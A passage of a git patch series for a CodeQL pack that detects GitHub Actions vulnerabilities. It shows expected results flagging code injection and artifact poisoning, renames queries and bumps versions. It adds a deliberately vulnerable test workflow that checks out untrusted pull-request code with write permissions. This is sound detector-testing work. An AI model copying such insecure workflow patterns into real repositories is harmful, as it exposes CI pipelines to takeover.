| env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref new file mode 100644 index 000000000000..f7ce5674994d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref deleted file mode 100644 index fbd758b6bd62..000000000000 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/PrivilegedCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml new file mode 100644 index 000000000000..0913ac8bbcfc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml @@ -0,0 +1,21 @@ +name: Actor + +on: pull_request + +permissions: + contents: write + +jobs: + template-oss: + name: test + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + runs-on: ubuntu-latest + defaults: + run: + shell: bash + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref deleted file mode 100644 index 21d37e957a1c..000000000000 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-829/ArtifactPoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected similarity index 73% rename from ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 2819bf62fdf6..a792da279005 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -41,16 +41,16 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | -| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref new file mode 100644 index 000000000000..4f8d2af04e8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningCritical.ql + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref new file mode 100644 index 000000000000..39548f274127 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningMedium.ql + diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref deleted file mode 100644 index 3c8de29c4502..000000000000 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-829/PrivilegedArtifactPoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref deleted file mode 100644 index 8fe52c7d9147..000000000000 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref deleted file mode 100644 index 32953132a45a..000000000000 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref new file mode 100644 index 000000000000..9f17733e16e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutCritical.ql diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref new file mode 100644 index 000000000000..66b3f2cd9bf2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref new file mode 100644 index 000000000000..55bb194f5ecd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutMedium.ql From e86fa9744aef3783108d225812be2e528ef116c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 21 May 2024 23:05:30 +0200 Subject: [PATCH 303/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b1a100a7040e..b3f4a7b112ee 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.26 +version: 0.0.27 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 341b6f45c298..c0aa886d0429 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.26 +version: 0.0.27 groups: - actions - queries From 4d28d6aa7c74ac627926882a9997c4cb95d65b6c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 11:07:52 +0200 Subject: [PATCH 304/707] Improve toctou queries --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 - 3 files changed, 2 insertions(+), 3 deletions(-) diff --git 